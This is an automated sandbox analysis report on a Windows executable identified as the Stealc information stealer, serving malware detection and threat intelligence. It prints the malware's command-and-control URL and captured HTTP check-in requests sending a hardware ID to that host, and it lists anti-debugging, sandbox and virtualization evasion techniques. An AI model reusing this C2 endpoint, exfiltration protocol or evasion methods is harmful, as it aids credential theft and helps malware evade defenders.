Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1531682
MD5:1ad0ccf6d6aa03ebe1f0d87e2b21e748
SHA1:a48f39c5b5a61d2aabf0d98844041e6b8ee3861e
SHA256:3b22774fae4edcd3086ddfda63b8d6a7b469081f69845521570dc42f70a05e4d
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6280 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1AD0CCF6D6AA03EBE1F0D87E2B21E748)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1693030135.0000000005040000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6280JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6280JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.530000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-11T16:00:06.089634+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: http://185.215.113.37/wsURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.530000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0053C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00537240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00537240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00539AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00539AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00539B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00539B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00548EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00548EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_005438B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00544910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00544910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0053DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0053E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00544570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00544570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0053ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0053BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0053DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005316D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0053F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00543EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00543EA0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 45 31 30 44 46 44 33 42 38 45 33 39 38 34 32 31 32 34 37 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 2d 2d 0d 0a Data Ascii: ------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="hwid"37E10DFD3B8E3984212470------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="build"doma------DGHJEHJJDAAAKEBGCFCA--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00534880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00534880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 45 31 30 44 46 44 33 42 38 45 33 39 38 34 32 31 32 34 37 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 2d 2d 0d 0a Data Ascii: ------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="hwid"37E10DFD3B8E3984212470------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="build"doma------DGHJEHJJDAAAKEBGCFCA--
                Source: file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/&
                Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/BiQ
                Source: file.exe, 00000000.00000002.1741085256.0000000001224000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/C84BCA9C91821060E9A79u
                Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpConnectionSettings
                Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpF
                Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpJ
                Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phphi
                Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37oZ

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081B0A60_2_0081B0A6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008EF9B70_2_008EF9B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084B1E20_2_0084B1E2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CD1AD0_2_007CD1AD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008222FE0_2_008222FE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009042140_2_00904214
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00900BA00_2_00900BA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DFD840_2_007DFD84
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008FD63E0_2_008FD63E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008FA6370_2_008FA637
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008817450_2_00881745
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081EF620_2_0081EF62
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 005345C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: iinbofzt ZLIB complexity 0.9948670885464936
                Source: file.exe, 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1693030135.0000000005040000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00549600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00549600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00543720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00543720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\OU5DW4AE.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1813504 > 1048576
                Source: file.exeStatic PE information: Raw size of iinbofzt is bigger than: 0x100000 < 0x194a00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.530000.0.unpack :EW;.rsrc :W;.idata :W; :EW;iinbofzt:EW;gnwcqqyo:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;iinbofzt:EW;gnwcqqyo:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00549860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00549860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1bb645 should be: 0x1bad49
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: iinbofzt
                Source: file.exeStatic PE information: section name: gnwcqqyo
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A150B8 push edx; mov dword ptr [esp], 5FBE8D00h0_2_00A150EE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A150B8 push 6CD5B4B7h; mov dword ptr [esp], esi0_2_00A151B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00990084 push edx; mov dword ptr [esp], esi0_2_0099014A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081B0A6 push 06CB0136h; mov dword ptr [esp], esi0_2_0081B17C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081B0A6 push esi; mov dword ptr [esp], 59B914C9h0_2_0081B192
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009908F9 push 10C74FE0h; mov dword ptr [esp], eax0_2_00990930
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054B035 push ecx; ret 0_2_0054B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009790E7 push 3A35086Fh; mov dword ptr [esp], edi0_2_00979106
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009790E7 push 5C194CE4h; mov dword ptr [esp], esi0_2_0097913D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A13804 push 233AAE31h; mov dword ptr [esp], ecx0_2_00A13831
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097D024 push 6477A542h; mov dword ptr [esp], edi0_2_0097D0F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00974057 push 3A240A94h; mov dword ptr [esp], ecx0_2_00974076
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088487C push ebx; mov dword ptr [esp], 00000000h0_2_00884911
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093B869 push 1E2E79E6h; mov dword ptr [esp], esi0_2_0093B8A3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009BA989 push ecx; mov dword ptr [esp], ebx0_2_009BA9BB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00951180 push esi; mov dword ptr [esp], ecx0_2_009511CB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00951180 push ebp; mov dword ptr [esp], eax0_2_009511D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009999BB push ebp; mov dword ptr [esp], 384CD99Dh0_2_00999A1F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CF1AD push ecx; mov dword ptr [esp], ebx0_2_009CF1D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008EF9B7 push 32EDA461h; mov dword ptr [esp], ebx0_2_008EF9E4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008EF9B7 push eax; mov dword ptr [esp], ecx0_2_008EFA41
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008EF9B7 push 43A76670h; mov dword ptr [esp], ebx0_2_008EFA49
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008EF9B7 push eax; mov dword ptr [esp], ebx0_2_008EFA8D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009081F5 push 58972CD5h; mov dword ptr [esp], ecx0_2_009081FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084B1E2 push 1CD28792h; mov dword ptr [esp], edi0_2_0084B1EB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084B1E2 push 0890CBDAh; mov dword ptr [esp], eax0_2_0084B2CD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084B1E2 push edx; mov dword ptr [esp], edi0_2_0084B31C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084B1E2 push esi; mov dword ptr [esp], 5FFB9B9Fh0_2_0084B34B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CC150 push ebp; mov dword ptr [esp], edx0_2_009CC24A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CC150 push 3214D443h; mov dword ptr [esp], ebx0_2_009CC252
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CD1AD push ecx; mov dword ptr [esp], 2ADFF4EBh0_2_007CD1C4
                Source: file.exeStatic PE information: section name: iinbofzt entropy: 7.954146839777977

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00549860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00549860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13448
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791B46 second address: 791B4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90068A second address: 90068E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90068E second address: 900694 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 900694 second address: 90069E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90069E second address: 9006A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791B5C second address: 791B60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90AC61 second address: 90AC65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90AEF2 second address: 90AEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90AEFB second address: 90AF01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90AF01 second address: 90AF05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
